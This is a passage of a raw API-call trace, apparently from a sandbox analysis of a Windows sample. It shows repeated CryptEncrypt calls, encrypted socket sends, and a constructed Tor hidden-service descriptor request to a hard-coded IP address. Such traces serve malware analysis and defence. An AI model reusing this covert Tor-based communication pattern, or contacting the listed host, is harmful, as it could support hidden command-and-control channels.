hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.814] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.814] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.815] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.816] malloc (_Size=0x1fd) returned 0x3def010 [0156.816] free (_Block=0x0) [0156.816] free (_Block=0x0) [0156.816] free (_Block=0x3d81e60) [0156.816] free (_Block=0x606108) [0156.816] malloc (_Size=0x1fd) returned 0x606108 [0156.816] free (_Block=0x0) [0156.816] malloc (_Size=0x1fd) returned 0x3d81e60 [0156.816] free (_Block=0x0) [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.817] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.818] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.819] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.819] malloc (_Size=0x1fd) returned 0x3def218 [0156.819] free (_Block=0x0) [0156.819] free (_Block=0x3def010) [0156.819] free (_Block=0x3d81e60) [0156.819] free (_Block=0x606108) [0156.819] malloc (_Size=0x202) returned 0x606108 [0156.819] free (_Block=0x0) [0156.819] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f3cc, MessageSeqNo=0x0 | out: pMessage=0x316f3cc) returned 0x0 [0156.819] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0156.820] free (_Block=0x606108) [0156.820] free (_Block=0x0) [0156.820] free (_Block=0x3def218) [0156.820] GetTickCount () returned 0x1168072 [0156.820] malloc (_Size=0x10) returned 0x3648d70 [0156.820] free (_Block=0x0) [0156.820] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d70*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0156.820] free (_Block=0x3648d70) [0156.820] GetTickCount () returned 0x1168072 [0156.820] malloc (_Size=0x10) returned 0x3648ce0 [0156.820] free (_Block=0x0) [0156.820] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ce0*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0157.147] free (_Block=0x3648ce0) [0157.147] GetTickCount () returned 0x11681ba [0157.147] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969d7 [0157.147] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x316f454 | out: phHash=0x316f454) returned 1 [0157.147] CryptHashData (hHash=0x432b78, pbData=0x316f48c, dwDataLen=0x5, dwFlags=0x0) returned 1 [0157.147] malloc (_Size=0x14) returned 0x3f653c0 [0157.147] free (_Block=0x0) [0157.148] CryptGetHashParam (in: hHash=0x432b78, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x316f44c, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x316f44c) returned 1 [0157.148] CryptDestroyHash (hHash=0x432b78) returned 1 [0157.148] malloc (_Size=0x10) returned 0x3648c80 [0157.148] free (_Block=0x0) [0157.148] malloc (_Size=0x44) returned 0x60ecd8 [0157.148] free (_Block=0x3648c80) [0157.148] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x316f494 | out: phHash=0x316f494) returned 1 [0157.148] CryptHashData (hHash=0x432d38, pbData=0x60ecd8, dwDataLen=0x1e, dwFlags=0x0) returned 1 [0157.148] malloc (_Size=0x14) returned 0x3f65500 [0157.148] free (_Block=0x0) [0157.148] CryptGetHashParam (in: hHash=0x432d38, dwParam=0x2, pbData=0x3f65500, pdwDataLen=0x316f48c, dwFlags=0x0 | out: pbData=0x3f65500, pdwDataLen=0x316f48c) returned 1 [0157.148] CryptDestroyHash (hHash=0x432d38) returned 1 [0157.148] free (_Block=0x60ecd8) [0157.148] free (_Block=0x3f653c0) [0157.148] malloc (_Size=0x21) returned 0x60dd68 [0157.148] free (_Block=0x0) [0157.148] _vscprintf (_Format="/tor/rendezvous2/%s", _ArgList=0x316f4ec) returned 49 [0157.148] malloc (_Size=0x32) returned 0x36246f0 [0157.148] free (_Block=0x0) [0157.149] vsprintf_s (in: _DstBuf=0x36246f0, _SizeInBytes=0x32, _Format="/tor/rendezvous2/%s", _ArgList=0x316f4ec | out: _DstBuf="/tor/rendezvous2/oj2t3r2p35hzpnnscqbu4obn6zhjmelb") returned 49 [0157.149] free (_Block=0x60dd68) [0157.149] free (_Block=0x3f65500) [0157.149] inet_ntoa (in=0x8c76dac1) returned="193.218.118.140" [0157.149] malloc (_Size=0x10) returned 0x3648e90 [0157.149] free (_Block=0x0) [0157.149] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f490) returned 89 [0157.149] malloc (_Size=0x5a) returned 0x60e018 [0157.149] free (_Block=0x0) [0157.149] vsprintf_s (in: _DstBuf=0x60e018, _SizeInBytes=0x5a, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f490 | out: _DstBuf="GET /tor/rendezvous2/oj2t3r2p35hzpnnscqbu4obn6zhjmelb HTTP/1.0\r\nHost: 193.218.118.140\r\n\r\n") returned 89 [0157.149] malloc (_Size=0x5a) returned 0x60e2f0 [0157.149] free (_Block=0x0) [0157.149] free (_Block=0x0) [0157.149] malloc (_Size=0x1fd) returned 0x606108 [0157.149] free (_Block=0x0) [0157.149] CryptHashData (hHash=0x432df8, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.150] CryptDuplicateHash (in: hHash=0x432df8, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f3ac | out: phHash=0x316f3ac) returned 1 [0157.150] malloc (_Size=0x14) returned 0x3f65520 [0157.150] free (_Block=0x0) [0157.150] CryptGetHashParam (in: hHash=0x432cf8, dwParam=0x2, pbData=0x3f65520, pdwDataLen=0x316f344, dwFlags=0x0 | out: pbData=0x3f65520, pdwDataLen=0x316f344) returned 1 [0157.150] CryptDestroyHash (hHash=0x432cf8) returned 1 [0157.150] free (_Block=0x3f65520) [0157.150] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.150] free (_Block=0x0) [0157.150] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.150] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.150] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.150] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.150] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.150] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.150] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.151] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f2fc*=0x10) returned 1 [0157.152] malloc (_Size=0x1fd) returned 0x3def010 [0157.152] free (_Block=0x0) [0157.153] free (_Block=0x0) [0157.153] free (_Block=0x3d81e60) [0157.153] free (_Block=0x606108) [0157.153] malloc (_Size=0x1fd) returned 0x606108 [0157.153] free (_Block=0x0) [0157.153] malloc 